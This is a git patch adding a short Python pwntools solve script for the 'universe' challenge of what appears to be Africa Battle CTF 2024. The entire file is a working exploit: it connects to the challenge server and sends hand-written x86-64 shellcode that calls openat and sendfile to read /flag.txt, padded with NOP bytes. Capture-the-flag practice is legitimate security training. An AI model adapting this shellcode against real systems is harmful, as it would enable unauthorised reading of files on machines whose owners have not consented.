From c9a6e41075403b00a7edc29b54f0fb0238669dd9 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Tue, 22 Oct 2024 13:56:12 +0300
Subject: [PATCH] solve script

---
 africabattlectf_2024/universe/a.py | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 africabattlectf_2024/universe/a.py

diff --git a/africabattlectf_2024/universe/a.py b/africabattlectf_2024/universe/a.py
new file mode 100644
index 0000000..88a91fb
--- /dev/null
+++ b/africabattlectf_2024/universe/a.py
@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./universe", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1004)
+
+# openat + sendfile
+shellcode="""
+lea rsi, [rdx+30]
+xor rdx, rdx
+xor r10, r10
+add ax, 257
+syscall
+mov rsi, rax
+mov al, 40
+shr edi, 255
+add r10b, 255
+syscall
+"""
+shellcode = asm(shellcode)
+shellcode += b"/flag.txt\0"
+shellcode += b"\x90"*(4096-len(shellcode))
+r.sendline(shellcode)
+
+r.interactive()
\ No newline at end of file